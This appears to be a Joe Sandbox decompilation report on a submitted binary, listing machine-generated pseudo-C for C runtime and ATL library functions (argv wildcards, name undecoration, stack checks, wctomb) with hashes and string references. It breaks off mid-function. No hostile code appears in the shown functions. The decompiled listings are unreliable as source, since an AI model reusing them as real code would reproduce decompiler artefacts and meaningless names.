                      • String ID: %ls$*$?$common_expand_argv_wildcards$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$result != nullptr$traits::tcsncpy_s( character_it, character_count - (character_it - character_first), *it, count)
                      • API String ID: 3210742261-976376051
                      • Opcode ID: 414043db0be1601bc37d10f78f5d656187b861cb89ec4a4ad3b1e62e65192ca4
                      • Instruction ID: 752b7417765953127a65f4170962db4d08a06e93bbaae52d1c87f9bdbf8f7f29
                      • Opcode Fuzzy Hash: 414043db0be1601bc37d10f78f5d656187b861cb89ec4a4ad3b1e62e65192ca4
                      • Instruction Fuzzy Hash: C5914C70D01208EFDF04EF94D996BEEB7B4BF99308F244419E4067B691EB746A44CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00941CF0 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 151COMMON
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E00941CF0(void* __ebx, char* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v2060;
				signed int _v2068;
				signed int _v2072;
				char* _v2076;
				char _v2084;
				char _v2612;
				char _v2616;
				signed int _t46;
				signed int _t47;
				void* _t49;
				signed int _t54;
				void* _t56;
				void* _t63;
				void* _t66;
				void* _t70;
				signed int _t76;
				char* _t95;
				void* _t97;
				void* _t102;
				void* _t103;
				void* _t104;
				signed int _t105;
				void* _t106;
				void* _t107;
				void* _t110;

				_t104 = __esi;
				_t95 = __edx;
				_t70 = __ebx;
				_t102 =  &_v2616;
				memset(_t102, 0xcccccccc, 0x28d << 2);
				_t107 = _t106 + 0xc;
				_t103 = _t102 + 0x28d;
				_t46 =  *0xa0600c; // 0x5d529087
				_t47 = _t46 ^ _t105;
				_v8 = _t47;
				if( *0xb3368c == 0xffffffff) {
					L3:
					L17:
					E009D14C0(_t105, 0x941f28);
					_t49 = _t47;
					_t97 = _t95;
					return E009D1520(E00957280(_t49, _t70, _v8 ^ _t105, _t97, _t103, _t104), _t105 - _t107 + 0xa34);
				}
				_t47 =  *0xb3368c;
				if(_t47 < _a16) {
					goto L3;
				}
				_t76 =  *0xb2f2f8; // 0xffffffff
				_t77 = _t76 & _a12;
				if((_t76 & _a12) != 0) {
					_t95 =  &_v2060;
					E0095AF80(_t103, _t95, 0, 0x800);
					_v2068 = 0;
					_t54 = E00941CA0(_t77, _a12);
					_t110 = _t107 + 0x10;
					_v2072 = _t54;
					__eflags = _v2072;
					if(__eflags == 0) {
						_t47 = E00941490(__eflags,  &_v2060, 0x400, L"%u - ", _a12);
						_t107 = _t110 + 0x10;
						_v2068 = _t47;
						__eflags = _v2068 - 0xffffffff;
						if(_v2068 != 0xffffffff) {
							L10:
							_t56 = E00995A70(_a20);
							_t107 = _t107 + 4;
							_t22 = _v2068 + 1; // 0x1
							_t95 = _t56 + _t22;
							_v2076 = _t95;
							E0094F150( &_v2084);
							__eflags = E0094F0C0( &_v2084, _t95, __eflags, _v2076) & 0x000000ff;
							if(__eflags != 0) {
								 *((short*)(E0094F180( &_v2084))) = 0;
								_push(_a20);
								_t95 = _v2076;
								_t63 = E00941490(__eflags, E0094F180( &_v2084), _t95, L"%ls%ls",  &_v2060);
								_t107 = _t107 + 0x14;
								__eflags = _t63 - 0xffffffff;
								if(__eflags != 0) {
									E0095AF80(_t103,  &_v2612, 0, 0x208);
									_t95 =  &_v2612;
									_t66 = E00941490(__eflags, _t95, 0x104, L"%hs", _a4);
									_t107 = _t107 + 0x1c;
									__eflags = _t66 - 0xffffffff;
									if(__eflags != 0) {
										L00994930(__eflags, 0,  &_v2612, _a8, 0, "%ls", E0094F180( &_v2084));
										_t107 = _t107 + 0x18;
										_t47 = E009422D0( &_v2084, __eflags);
									} else {
										_t47 = E009422D0( &_v2084, __eflags);
									}
								} else {
									_t47 = E009422D0( &_v2084, __eflags);
								}
							} else {
								_t47 = E009422D0( &_v2084, __eflags);
							}
							goto L17;
						}
						goto L17;
					}
					_t95 =  &_v2060;
					_t47 = E00941490(__eflags, _t95, 0x400, L"%ls - ", _v2072);
					_t107 = _t110 + 0x10;
					_v2068 = _t47;
					__eflags = _v2068 - 0xffffffff;
					if(_v2068 != 0xffffffff) {
						goto L10;
					} else {
						goto L17;
					}
				}
				goto L3;
			}





























                      0x00941cf0
                      0x00941cf0
                      0x00941cf0
                      0x00941cfa
                      0x00941d0a
                      0x00941d0a
                      0x00941d0a
                      0x00941d0c
                      0x00941d11
                      0x00941d13
                      0x00941d1d
                      0x00941d34
                      0x00941ef9
                      0x00941f03
                      0x00941f08
                      0x00941f09
                      0x00941f25
                      0x00941f25
                      0x00941d1f
                      0x00941d27
                      0x00000000
                      0x00000000
                      0x00941d29
                      0x00941d2f
                      0x00941d32
                      0x00941d40
                      0x00941d47
                      0x00941d4f
                      0x00941d5d
                      0x00941d62
                      0x00941d65
                      0x00941d6b
                      0x00941d72
                      0x00941dbf
                      0x00941dc4
                      0x00941dc7
                      0x00941dcd
                      0x00941dd4
                      0x00941ddb
                      0x00941ddf
                      0x00941de4
                      0x00941ded
                      0x00941ded
                      0x00941df1
                      0x00941dfd
                      0x00941e17
                      0x00941e19
                      0x00941e40
                      0x00941e47
                      0x00941e54
                      0x00941e67
                      0x00941e6c
                      0x00941e6f
                      0x00941e72
                      0x00941e8f
                      0x00941ea5
                      0x00941eac
                      0x00941eb1
                      0x00941eb4
                      0x00941eb7
                      0x00941ee6
                      0x00941eeb
                      0x00941ef4
                      0x00941eb9
                      0x00941ebf
                      0x00941ebf
                      0x00941e74
                      0x00941e7a
                      0x00941e7a
                      0x00941e1b
                      0x00941e21
                      0x00941e21
                      0x00000000
                      0x00941e19
                      0x00000000
                      0x00941dd6
                      0x00941d85
                      0x00941d8c
                      0x00941d91
                      0x00941d94
                      0x00941d9a
                      0x00941da1
                      0x00000000
                      0x00941da3
                      0x00000000
                      0x00941da3
                      0x00941da1
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Module$CheckStackVars@8
                      • String ID: %hs$%ls$%ls - $%ls%ls$%u -
                      • API String ID: 3912913270-3378233065
                      • Opcode ID: 56d5712ebe91563c41c59fad75e4e7c09e5ba66df88677a222bdbff4c52a733e
                      • Instruction ID: 39d7e09f8fc898965e97a3c2a41835f11368bba5bc3de517700f8e58124d5fe0
                      • Opcode Fuzzy Hash: 56d5712ebe91563c41c59fad75e4e7c09e5ba66df88677a222bdbff4c52a733e
                      • Instruction Fuzzy Hash: 3551B1B5910208AACB14EB24DC52FEA73B8BF84314F4086A9F956571D2EE706BC5CFD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00967390 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 127COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00967390(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				char _v52;
				signed int _v56;
				char _v60;
				char* _t46;
				intOrPtr _t50;
				char* _t51;
				char _t60;
				char _t64;
				signed int _t68;
				char _t69;
				char _t71;
				intOrPtr _t77;
				char* _t94;
				intOrPtr _t96;
				intOrPtr _t98;
				intOrPtr _t99;
				signed int _t104;
				void* _t105;
				void* _t106;

				_t46 =  *0xb30640; // 0x0
				if( *_t46 == 0) {
					L20:
					E0095F3F0(_a4);
					return _a4;
				}
				_t94 =  *0xb30640; // 0x0
				if( *_t94 != 0x5f) {
					goto L20;
				}
				_t77 =  *0xb30640; // 0x0
				if( *((char*)(_t77 + 1)) == 0) {
					goto L20;
				}
				_t50 =  *0xb30640; // 0x0
				if( *((char*)(_t50 + 1)) > 0x44) {
					goto L20;
				}
				_t96 =  *0xb30640; // 0x0
				 *0xb30640 = _t96 + 1;
				_t51 =  *0xb30640; // 0x0
				_v20 =  *_t51 - 0x41;
				_t98 =  *0xb30640; // 0x0
				_t99 = _t98 + 1;
				 *0xb30640 = _t99;
				_v8 = _v20;
				if(_v8 > 3) {
					E0095F350(_a4, 2);
					return _a4;
				}
				E0095F3F0( &_v28);
				if(E00962230( &_v28) == 0) {
					L18:
					E0095F240(_a4,  &_v28);
					return _a4;
				}
				E0095FDE0( &_v28, 0x20);
				_t60 = E00960130( &_v28, 0xf);
				_t106 = _t105 + 4;
				_v36 = _t60;
				_v32 = _t99;
				E0095FCA0( &_v28,  &_v36);
				while(_v8 != 0) {
					_t104 =  !_v8 + 0x00000001 & _v8;
					_v16 = _t104;
					_v12 = _v16;
					if(_v12 == 1) {
						_t64 = E00960060("cpu", 3);
						_t106 = _t106 + 8;
						_v44 = _t64;
						_v40 = _t104;
						E0095FCA0( &_v28,  &_v44);
						L14:
						_t68 =  !_v16 & _v8;
						_v8 = _t68;
						if(_t68 != 0) {
							_t69 = E00960060(", ", 2);
							_t106 = _t106 + 8;
							_v60 = _t69;
							_v56 = _t104;
							E0095FCA0( &_v28,  &_v60);
						}
						continue;
					}
					if(_v12 == 2) {
						_t71 = E00960060("amp", 3);
						_t106 = _t106 + 8;
						_v52 = _t71;
						_v48 = _t104;
						_t104 =  &_v52;
						E0095FCA0( &_v28, _t104);
						goto L14;
					}
					E0095F350(_a4, 2);
					return _a4;
				}
				E0095FDE0( &_v28, 0x29);
				goto L18;
			}
































                      0x00967396
                      0x009673a0
                      0x00967535
                      0x00967538
                      0x00000000
                      0x0096753d
                      0x009673a6
                      0x009673b2
                      0x00000000
                      0x00000000
                      0x009673b8
                      0x009673c4
                      0x00000000
                      0x00000000
                      0x009673ca
                      0x009673d6
                      0x00000000
                      0x00000000
                      0x009673dc
                      0x009673e5
                      0x009673eb
                      0x009673f6
                      0x009673f9
                      0x009673ff
                      0x00967402
                      0x0096740b
                      0x00967412
                      0x00967529
                      0x00000000
                      0x0096752e
                      0x0096741b
                      0x00967427
                      0x00967511
                      0x00967518
                      0x00000000
                      0x0096751d
                      0x00967432
                      0x00967439
                      0x0096743e
                      0x00967441
                      0x00967444
                      0x0096744e
                      0x00967453
                      0x00967465
                      0x00967468
                      0x0096746e
                      0x00967475
                      0x00967486
                      0x0096748b
                      0x0096748e
                      0x00967491
                      0x0096749b
                      0x009674d4
                      0x009674d9
                      0x009674dc
                      0x009674df
                      0x009674e8
                      0x009674ed
                      0x009674f0
                      0x009674f3
                      0x009674fd
                      0x009674fd
                      0x00000000
                      0x00967502
                      0x0096747b
                      0x009674a9
                      0x009674ae
                      0x009674b1
                      0x009674b4
                      0x009674b7
                      0x009674be
                      0x00000000
                      0x009674be
                      0x009674ca
                      0x00000000
                      0x009674cf
                      0x0096750c
                      0x00000000

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0096741B
                      • UnDecorator::doMSKeywords.LIBCMTD ref: 00967420
                      • DName::operator+=.LIBCMTD ref: 00967432
                        • Part of subcall function 0095FDE0: DName::isValid.LIBCMTD ref: 0095FDEC
                        • Part of subcall function 0095FDE0: DName::isEmpty.LIBCMTD ref: 0095FE00
                        • Part of subcall function 00960130: UnDecorator::doUnderScore.LIBCMTD ref: 00960136
                        • Part of subcall function 0095FCA0: DName::isValid.LIBCMTD ref: 0095FCAC
                        • Part of subcall function 0095FCA0: DName::isEmpty.LIBCMTD ref: 0095FCC1
                      • DName::DName.LIBVCRUNTIMED ref: 009674CA
                        • Part of subcall function 0095FCA0: DName::append.LIBCMTD ref: 0095FD24
                      • DName::operator+=.LIBCMTD ref: 0096750C
                      • Mailbox.LIBCMTD ref: 00967518
                      • DName::DName.LIBVCRUNTIMED ref: 00967529
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00967538
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name::is$Decorator::doEmptyIterator_baseIterator_base::_NameName::Name::operator+=Validstd::_$KeywordsMailboxName::appendScoreUnder
                      • String ID: amp$cpu
                      • API String ID: 4042095736-2542064945
                      • Opcode ID: 84fc07e958aad58cabc46e1f040b9147033017aa547fdade7b0a88a7ccdf20c4
                      • Instruction ID: 076c7d39e1cc6221537b1294e0ec24b30685e53c97fe3e892f1e5274d8a95b8f
                      • Opcode Fuzzy Hash: 84fc07e958aad58cabc46e1f040b9147033017aa547fdade7b0a88a7ccdf20c4
                      • Instruction Fuzzy Hash: B851A770D54108DBDB04EFE4D8A6BEDBBB1BF84345F1480A9F9066B295DB30AA45CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00947C00 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 125COMMON
                      Download Yara Rule
                      C-Code - Quality: 95%
                      			E00947C00(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				char _v32;
				char _v40;
				char _v44;
				char _v48;
				void* _t43;
				intOrPtr _t44;
				void* _t46;
				void* _t49;
				void* _t59;
				void* _t73;
				signed int _t100;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;

				_t107 = __esi;
				_t100 = __edx;
				_t73 = __ebx;
				_t105 =  &_v48;
				memset(_t105, 0xcccccccc, 0xb << 2);
				_t110 = _t109 + 0xc;
				_t106 = _t105 + 0xb;
				if(_a8 == 0) {
					L2:
					_t43 = L00994930(_t114, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0xe3, 0, "%ls", L"lpszKey != 0 && lpszItem != 0");
					_t110 = _t110 + 0x18;
					if(_t43 == 1) {
						asm("int3");
					}
					L4:
					if(_a8 == 0 || _a12 == 0) {
						_t44 = 0x80070057;
					} else {
						_v8 = 0x8007000e;
						E00942AF0(_a4 + 0x10);
						_t49 = E00992E00(_a8);
						_t110 = _t110 + 4;
						_v12 = _t49 + 1;
						E0094EC30( &_v20);
						_t100 = _v12;
						__eflags = E0094EB10(_t73,  &_v20, _t106, _t107, _t100) & 0x000000ff;
						if(__eflags != 0) {
							E009426F0(_t73, _t106, _t107, __eflags, E0094EBF0( &_v20), _v12, _a8);
							_t59 = E00992E00(_a12);
							_t110 = _t110 + 0x10;
							_v12 = _t59 + 1;
							E0094EC30( &_v32);
							_t100 = E0094EB10(_t73,  &_v32, _t106, _t107, _v12) & 0x000000ff;
							__eflags = _t100;
							if(__eflags != 0) {
								E009426F0(_t73, _t106, _t107, __eflags, E0094EBF0( &_v32), _v12, _a12);
								_t110 = _t110 + 0xc;
								_v40 = E0094EBF0( &_v32);
								_v44 = E0094EBF0( &_v20);
								_t100 =  &_v40;
								__eflags = E0094E340(_a4 + 4,  &_v44, _t100);
								if(__eflags != 0) {
									_v8 = 0;
									E0094EAE0( &_v20);
									E0094EAE0( &_v32);
								}
							}
							E0094EC00( &_v32, __eflags);
						}
						__eflags = _a4 + 0x10;
						E00942B00(_a4 + 0x10);
						_v48 = _v8;
						E0094EC00( &_v20, __eflags);
						_t44 = _v48;
					}
					_push(_t100);
					E009D14C0(_t108, 0x947d8c);
					_t46 = _t44;
					return E009D1520(_t46, _t108 - _t110 + 0x2c);
				}
				_t114 = _a12;
				if(_a12 != 0) {
					goto L4;
				}
				goto L2;
			}























                      0x00947c00
                      0x00947c00
                      0x00947c00
                      0x00947c07
                      0x00947c14
                      0x00947c14
                      0x00947c14
                      0x00947c1a
                      0x00947c22
                      0x00947c3a
                      0x00947c3f
                      0x00947c45
                      0x00947c47
                      0x00947c47
                      0x00947c48
                      0x00947c4c
                      0x00947c54
                      0x00947c5e
                      0x00947c5e
                      0x00947c6b
                      0x00947c74
                      0x00947c79
                      0x00947c7f
                      0x00947c85
                      0x00947c8a
                      0x00947c99
                      0x00947c9b
                      0x00947cb2
                      0x00947cbe
                      0x00947cc3
                      0x00947cc9
                      0x00947ccf
                      0x00947ce0
                      0x00947ce3
                      0x00947ce5
                      0x00947cf8
                      0x00947cfd
                      0x00947d08
                      0x00947d13
                      0x00947d16
                      0x00947d29
                      0x00947d2b
                      0x00947d2d
                      0x00947d37
                      0x00947d3f
                      0x00947d3f
                      0x00947d2b
                      0x00947d47
                      0x00947d47
                      0x00947d4f
                      0x00947d52
                      0x00947d5a
                      0x00947d60
                      0x00947d65
                      0x00947d65
                      0x00947d68
                      0x00947d72
                      0x00947d77
                      0x00947d87
                      0x00947d87
                      0x00947c1c
                      0x00947c20
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      Strings
                      • lpszKey != 0 && lpszItem != 0, xrefs: 00947C22
                      • %ls, xrefs: 00947C27
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00947C33
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Module__crt_unique_heap_ptr_strlen$CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$lpszKey != 0 && lpszItem != 0
                      • API String ID: 4051287597-3321575645
                      • Opcode ID: 5d7653607b0b8321a483d25c2d8b5935a523689305011a0e4a989567130515c4
                      • Instruction ID: a0d1d702d94a518fd339643bb920c79323732257ad5383ab703e63ad3425af35
                      • Opcode Fuzzy Hash: 5d7653607b0b8321a483d25c2d8b5935a523689305011a0e4a989567130515c4
                      • Instruction Fuzzy Hash: D2412172D00209ABCF14EFD4D892FEEB375BF94304F148929F5166B292DB359A44CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009D15E0 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 79COMMON
                      Download Yara Rule
                      C-Code - Quality: 46%
                      			E009D15E0(void* __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v28;
				char _v80;
				char _v324;
				intOrPtr _v328;
				void* __ebx;
				void* __edi;
				signed int _t18;
				signed int _t30;
				intOrPtr _t36;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t46;

				_t44 = __esi;
				_t37 = __ecx;
				_t18 =  *0xa0600c; // 0x5d529087
				_v8 = _t18 ^ _t46;
				_t20 = _a4;
				_t36 = _a8;
				_t43 =  *0xb2f3e8; // 0x1
				_v328 = _a4;
				if(_t43 == 0xffffffff) {
					L4:
					__eflags = _v8 ^ _t46;
					return E00957280(_t20, _t36, _v8 ^ _t46, _t42, _t43, _t44);
				} else {
					if(_t36 != 0) {
						_push(__esi);
						_t7 = _t36 + 0x20; // 0x21
						_t45 = _t7;
						E009D17D0(__ecx,  &_v28,  &_v80, _t45,  *((intOrPtr*)(_t36 + 0xc)) - 0x24);
						_push("\n");
						_push( &_v80);
						_push("> ");
						_push( &_v28);
						_push("\nData: <");
						_push(_a12);
						_t30 =  *((intOrPtr*)(_t36 + 0xc)) - 0x24;
						__eflags = _t30;
						_push("\nAllocation number within this function: ");
						_push(_t30);
						_push("\nSize: ");
						_push(_t45);
						_push("\nAddress: 0x");
						E00954240(_t30,  &_v324, 0xf4, "%s%s%p%s%zd%s%d%s%s%s%s%s", "Stack area around _alloca memory reserved by this function is corrupted");
						_t20 = E009D1860(_t37, _t42, _v328, _t43, 4,  &_v324);
						_pop(_t44);
						goto L4;
					} else {
						return E00957280(E009D1860(__ecx, _t42, _t20, _t43, 4, "Stack area around _alloca memory reserved by this function is corrupted\n"), _t36, _v8 ^ _t46, _t42, _t43, __esi);
					}
				}
			}

















                      0x009d15e0
                      0x009d15e0
                      0x009d15e9
                      0x009d15f0
                      0x009d15f3
                      0x009d15f7
                      0x009d15fb
                      0x009d1601
                      0x009d160a
                      0x009d16b6
                      0x009d16ba
                      0x009d16c5
                      0x009d1610
                      0x009d1612
                      0x009d1638
                      0x009d163c
                      0x009d163c
                      0x009d1649
                      0x009d164e
                      0x009d1656
                      0x009d1657
                      0x009d165f
                      0x009d1663
                      0x009d1668
                      0x009d166b
                      0x009d166b
                      0x009d166e
                      0x009d1673
                      0x009d1674
                      0x009d1679
                      0x009d167a
                      0x009d1695
                      0x009d16ad
                      0x009d16b5
                      0x00000000
                      0x009d1614
                      0x009d1634
                      0x009d1634
                      0x009d1612

                      APIs
                      • failwithmessage.LIBCMTD ref: 009D161D
                        • Part of subcall function 009D1860: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 009D18C1
                        • Part of subcall function 009D1860: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000000), ref: 009D18E0
                        • Part of subcall function 009D1860: DebuggerProbe.LIBCMTD ref: 009D18FA
                        • Part of subcall function 009D1860: DebuggerRuntime.LIBCMTD ref: 009D1916
                        • Part of subcall function 009D1860: IsDebuggerPresent.KERNEL32 ref: 009D193F
                      • _getMemBlockDataString.LIBCMTD ref: 009D1649
                      • failwithmessage.LIBCMTD ref: 009D16AD
                      Strings
                      • Stack area around _alloca memory reserved by this function is corrupted, xrefs: 009D167F
                      • %s%s%p%s%zd%s%d%s%s%s%s%s, xrefs: 009D1684
                      • Allocation number within this function: , xrefs: 009D166E
                      • Stack area around _alloca memory reserved by this function is corrupted, xrefs: 009D1614
                      • Data: <, xrefs: 009D1663
                      • Address: 0x, xrefs: 009D167A
                      • Size: , xrefs: 009D1674
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Debugger$ByteCharMultiWidefailwithmessage$BlockDataPresentProbeRuntimeString_get
                      • String ID: Address: 0x$Allocation number within this function: $Data: <$Size: $%s%s%p%s%zd%s%d%s%s%s%s%s$Stack area around _alloca memory reserved by this function is corrupted$Stack area around _alloca memory reserved by this function is corrupted
                      • API String ID: 4067135985-3301296223
                      • Opcode ID: 39c9963b9af4956579eed2f1f764b095982dfd3b2ea21f8ad75f3ff4a76a1e6e
                      • Instruction ID: c8c033cb84af2c85d9fa03e38e79b1282f971eb761fed1a6ff6be3110f05e432
                      • Opcode Fuzzy Hash: 39c9963b9af4956579eed2f1f764b095982dfd3b2ea21f8ad75f3ff4a76a1e6e
                      • Instruction Fuzzy Hash: 45218372A4020CBBCB10DED5EC86FEE777CEB48714F044556FA19A71C1DA70A95587A0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009A5AF0 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 265COMMON
                      Download Yara Rule
                      C-Code - Quality: 93%
                      			E009A5AF0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, char* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v96;
				intOrPtr _t102;
				long _t106;
				void* _t111;
				void* _t125;
				void* _t142;
				void* _t145;
				intOrPtr _t167;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;

				_t180 = __esi;
				_t179 = __edi;
				_t145 = __ebx;
				if(_a8 == 0 && _a12 > 0) {
					if(_a4 != 0) {
						 *_a4 = 0;
					}
					return 0;
				}
				__eflags = _a4;
				if(_a4 != 0) {
					_t146 = _a4;
					 *_a4 = 0xffffffff;
				}
				__eflags = _a12 - 0x7fffffff;
				if(_a12 > 0x7fffffff) {
					_v12 = 0;
				} else {
					_v12 = 1;
				}
				_v16 = _v12;
				__eflags = _v16;
				if(__eflags == 0) {
					_t142 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x34, 0, L"%ls", L"destination_count <= INT_MAX");
					_t181 = _t181 + 0x18;
					__eflags = _t142 - 1;
					if(_t142 == 1) {
						asm("int3");
					}
				}
				__eflags = _v16;
				if(_v16 != 0) {
					L00976CC0(_t145,  &_v96, _t180, _a20);
					_t167 =  *((intOrPtr*)(E00977A60( &_v96)));
					__eflags =  *((intOrPtr*)(_t167 + 8)) - 0xfde9;
					if( *((intOrPtr*)(_t167 + 8)) != 0xfde9) {
						_t151 =  *((intOrPtr*)(E00977A60( &_v96)));
						__eflags =  *((intOrPtr*)(_t151 + 0xbadc4d));
						if( *((intOrPtr*)(_t151 + 0xbadc4d)) != 0) {
							_v32 = 0;
							_t154 =  *((intOrPtr*)( *((intOrPtr*)(E00977A60( &_v96))) + 8));
							_t102 = E009B0A90( *((intOrPtr*)( *((intOrPtr*)(E00977A60( &_v96))) + 8)), 0,  &_a16, 1, _a8, _a12, 0,  &_v32);
							_t182 = _t181 + 0x20;
							_v8 = _t102;
							__eflags = _v8;
							if(_v8 == 0) {
								L42:
								__eflags = _v8;
								if(_v8 != 0) {
									L55:
									 *((intOrPtr*)(L00992F70(_t154))) = 0x2a;
									_v68 = 0x2a;
									E00977230( &_v96);
									return _v68;
								}
								_t106 = GetLastError();
								__eflags = _t106 - 0x7a;
								if(_t106 != 0x7a) {
									goto L55;
								}
								__eflags = _a8;
								if(_a8 != 0) {
									__eflags = _a12;
									if(_a12 > 0) {
										E0095AF80(_t179, _a8, 0, _a12);
										_t182 = _t182 + 0xc;
									}
								}
								_t154 = 0;
								__eflags = 0;
								if(0 == 0) {
									_v36 = 0;
								} else {
